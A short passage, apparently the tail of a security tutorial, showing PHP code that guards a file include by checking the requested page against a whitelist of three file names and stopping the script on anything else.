850. $file =$_GET['page'];
851. $check = array('index.php', 'new.php', 'guestbook.php');
852. if(in_array($file, $check)) <-- Check $_GET['page'] from array[]
853. {include($file);}
854. else{die("Don't Hack Me Plz!");}
855. ?>
856. [End code]------------------------------------------------------------------------------